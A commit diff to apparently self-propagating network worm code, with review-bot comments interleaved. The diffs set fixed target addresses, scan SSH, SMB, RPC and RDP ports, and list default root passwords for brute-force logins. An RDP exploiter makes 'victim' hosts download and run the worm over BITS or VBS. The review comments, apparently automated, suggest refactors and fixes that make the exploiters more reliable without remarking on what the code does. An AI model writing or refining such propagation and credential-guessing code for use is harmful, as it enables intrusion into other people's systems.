minor bug fix

Barak Hoffer 2015-09-30 15:05:30 +03:00
parent 410891518f
commit 73f9821ee4
8 changed files with 39 additions and 16 deletions


@ -96,6 +96,8 @@ class Configuration(object):
### monkey config ### monkey config
########################### ###########################
alive = True
singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}" singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"
# how long to wait between scan iterations # how long to wait between scan iterations
@ -127,11 +129,11 @@ class Configuration(object):
#range_class = RelativeRange #range_class = RelativeRange
range_size = 8 range_size = 8
range_class = ClassCRange range_class = FixedRange
range_fixed = ("10.0.0.1") range_fixed = ("10.0.0.9", "10.0.0.13", "192.168.1.100", "192.168.1.87")
# TCP Scanner # TCP Scanner
tcp_target_ports = [22, 445, 135] tcp_target_ports = [22, 445, 135, 3389]
tcp_scan_timeout = 1000 # 1000 Milliseconds tcp_scan_timeout = 1000 # 1000 Milliseconds
tcp_scan_interval = 200 tcp_scan_interval = 200
tcp_scan_get_banner = True tcp_scan_get_banner = True
@ -157,6 +159,7 @@ class Configuration(object):
ssh_user = "root" ssh_user = "root"
ssh_passwords = ["root", "toor", "1234", "12345678"] ssh_passwords = ["root", "toor", "1234", "12345678"]
alive = True #rdp exploiter
rdp_use_vbs_download = True
WormConfiguration = Configuration() WormConfiguration = Configuration()
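Review bot: The new `range_fixed` tuple and the switch to `range_class = FixedRange` commit what look like one test network's addresses as the shipped defaults; that reading is inferred from the private addresses, and the commit message ("minor bug fix") does not mention a scope change. Consider keeping site-specific targets in a local override, and add a comment such as `# explicit scan scope: only these hosts are probed when range_class is FixedRange`. The new `rdp_use_vbs_download` flag has no comment either; `# True: use the VBS download command line, False: use the BITS one` would match the constant names imported in the RDP exploiter. The `Configuration` class body continues outside these hunks.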


@ -11,7 +11,7 @@ from rdpy.core.error import RDPSecurityNegoFail
from logging import getLogger from logging import getLogger
from exploit import HostExploiter from exploit import HostExploiter
from exploit.tools import HTTPTools from exploit.tools import HTTPTools
from model import RDP_CMDLINE_HTTP_BITS from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
from model.host import VictimHost from model.host import VictimHost
from network.tools import check_port_tcp from network.tools import check_port_tcp
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
@ -243,7 +243,10 @@ class RdpExploiter(HostExploiter):
# create server for http download. # create server for http download.
http_path, http_thread = HTTPTools.create_transfer(host, src_path) http_path, http_thread = HTTPTools.create_transfer(host, src_path)
command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(src_path), 'http_path' : http_path} if self._config.rdp_use_vbs_download:
command = RDP_CMDLINE_HTTP_VBS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
else:
command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
passwords = list(self._config.psexec_passwords[:]) passwords = list(self._config.psexec_passwords[:])
known_password = host.get_credentials(self._config.psexec_user) known_password = host.get_credentials(self._config.psexec_user)
@ -288,10 +291,7 @@ class RdpExploiter(HostExploiter):
if not exploited: if not exploited:
LOG.debug("Exploiter RdpGrinder failed, rdp failed.") LOG.debug("Exploiter RdpGrinder failed, rdp failed.")
return False return False
elif http_thread.downloads == 0: elif http_thread.downloads == 0:
LOG.info("Trying rdp logging into victim %r with user"
" %s and password '%s'", host,
self._config.psexec_user, password)
LOG.debug("Exploiter RdpGrinder failed, http download failed.") LOG.debug("Exploiter RdpGrinder failed, http download failed.")
return False return False
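Review bot: The two branches added under `if self._config.rdp_use_vbs_download:` build the same `monkey_name`/`http_path` mapping and differ only in the template constant, so the mapping is written twice and the copies can drift apart. Select the template first, `template = RDP_CMDLINE_HTTP_VBS if self._config.rdp_use_vbs_download else RDP_CMDLINE_HTTP_BITS`, then format once with `command = template % {...}`. The change of `monkey_name` from `src_path` to `self._config.dropper_target_path` is not mentioned in the commit message and deserves a one-line comment saying why the file name now comes from config. The enclosing method starts and ends outside these hunks.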


@ -3,6 +3,7 @@ from logging import getLogger
from model.host import VictimHost from model.host import VictimHost
from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED
from exploit import HostExploiter from exploit import HostExploiter
from network.tools import check_port_tcp
from exploit.tools import SmbTools, get_target_monkey from exploit.tools import SmbTools, get_target_monkey
from network import SMBFinger from network import SMBFinger
@ -49,7 +50,7 @@ class SmbExploiter(HostExploiter):
is_nb_open,_ = check_port_tcp(host.ip_addr, 139) is_nb_open,_ = check_port_tcp(host.ip_addr, 139)
if is_nb_open: if is_nb_open:
host.os['type'] = 'windows' host.os['type'] = 'windows'
return super(HostExploiter, self).is_os_supported(host) return host.os.get('type') in self._target_os_type
return False return False
def exploit_host(self, host, src_path=None): def exploit_host(self, host, src_path=None):
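Review bot: The replacement `return host.os.get('type') in self._target_os_type` appears to copy the base-class check into the subclass instead of correcting the `super()` call, whose first argument named the wrong class. `return super(SmbExploiter, self).is_os_supported(host)` would keep a single implementation; the base method is not visible here, so confirm it performs the same membership test. A short comment that an open port 139 alone is taken as evidence of Windows would also help, since `host.os['type']` is set on that basis. The method starts outside the hunk.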


@ -5,10 +5,12 @@ import logging
from exploit import HostExploiter from exploit import HostExploiter
from model import MONKEY_ARG from model import MONKEY_ARG
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
from network.tools import check_port_tcp
__author__ = 'hoffer' __author__ = 'hoffer'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
SSH_PORT = 22
class SSHExploiter(HostExploiter): class SSHExploiter(HostExploiter):
_target_os_type = ['linux', None] _target_os_type = ['linux', None]
@ -20,6 +22,16 @@ class SSHExploiter(HostExploiter):
ssh = paramiko.SSHClient() ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
port = SSH_PORT
for servkey,servdata in host.services.items():
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
port = int(servkey.replace('tcp-',''))
is_open,_ = check_port_tcp(host.ip_addr, port)
if not is_open:
LOG.info("SSH port is closed on %r, skipping", host)
return False
passwords = list(self._config.ssh_passwords[:]) passwords = list(self._config.ssh_passwords[:])
known_password = host.get_credentials(self._config.ssh_user) known_password = host.get_credentials(self._config.ssh_user)
if known_password is not None: if known_password is not None:
@ -32,7 +44,8 @@ class SSHExploiter(HostExploiter):
try: try:
ssh.connect(host.ip_addr, ssh.connect(host.ip_addr,
username=self._config.ssh_user, username=self._config.ssh_user,
password=password) password=password,
port=port)
LOG.debug("Successfully logged in %r using SSH (%s : %s)", LOG.debug("Successfully logged in %r using SSH (%s : %s)",
host, self._config.ssh_user, password) host, self._config.ssh_user, password)
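Review bot: The port-discovery loop added before the `check_port_tcp` call has no `break` and no error handling. If `host.services` holds more than one entry named `ssh`, whichever is iterated last wins, and `int(servkey.replace('tcp-',''))` raises ValueError on a key that is not of the form `tcp-<number>`. Adding `break` after the assignment and catching ValueError with a fallback to `SSH_PORT` would make the choice deterministic. The loop also assumes every `servdata` is a dict with a `get` method, which is not shown here. The enclosing method starts and ends outside these hunks.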


@ -15,6 +15,7 @@ from model.host import VictimHost
from model import DROPPER_CMDLINE, MONKEY_CMDLINE from model import DROPPER_CMDLINE, MONKEY_CMDLINE
from exploit import HostExploiter from exploit import HostExploiter
from exploit.tools import SmbTools, get_target_monkey from exploit.tools import SmbTools, get_target_monkey
from network.tools import check_port_tcp
try: try:
from impacket import smb from impacket import smb


@ -5,6 +5,7 @@ import logging
from network import HostScanner from network import HostScanner
from config import WormConfiguration from config import WormConfiguration
from info import local_ips from info import local_ips
from network.range import *
__author__ = 'itamar' __author__ = 'itamar'
@ -26,8 +27,12 @@ class NetworkScanner(object):
LOG.info("Found local IP addresses of the machine: %r", self._ip_addresses) LOG.info("Found local IP addresses of the machine: %r", self._ip_addresses)
self._ranges = [WormConfiguration.range_class(ip_address) # for fixed range, only scan once.
for ip_address in self._ip_addresses] if WormConfiguration.range_class is FixedRange:
self._ranges = [WormConfiguration.range_class('0.0.0.0')]
else:
self._ranges = [WormConfiguration.range_class(ip_address)
for ip_address in self._ip_addresses]
LOG.info("Base local networks to scan are: %r", self._ranges) LOG.info("Base local networks to scan are: %r", self._ranges)
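Review bot: `from network.range import *` appears to be added only so that `FixedRange` resolves in the new `is FixedRange` test. A wildcard import hides where the name comes from and can shadow names already defined in this module, so use `from network.range import FixedRange` instead. The `'0.0.0.0'` passed to the constructor looks like a placeholder that the fixed range ignores; if so, a comment such as `# base address is unused by FixedRange; targets come from range_fixed` would save the next reader a lookup. The enclosing method starts outside the hunk.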


@ -13,7 +13,7 @@ from model.host import VictimHost
SSH_PORT = 22 SSH_PORT = 22
SSH_SERVICE = 'tcp-22' SSH_SERVICE = 'tcp-22'
SSH_REGEX = 'SSH-\d\.\d-OpenSSH' SSH_REGEX = 'SSH-\d\.\d-OpenSSH'
TIMEOUT = 30 TIMEOUT = 10
BANNER_READ = 1024 BANNER_READ = 1024
LINUX_DIST_SSH = ['ubuntu', 'debian'] LINUX_DIST_SSH = ['ubuntu', 'debian']


@ -1,7 +1,7 @@
import socket import socket
import select import select
DEFAULT_TIMEOUT = 30 DEFAULT_TIMEOUT = 10
BANNER_READ = 1024 BANNER_READ = 1024
def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False): def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):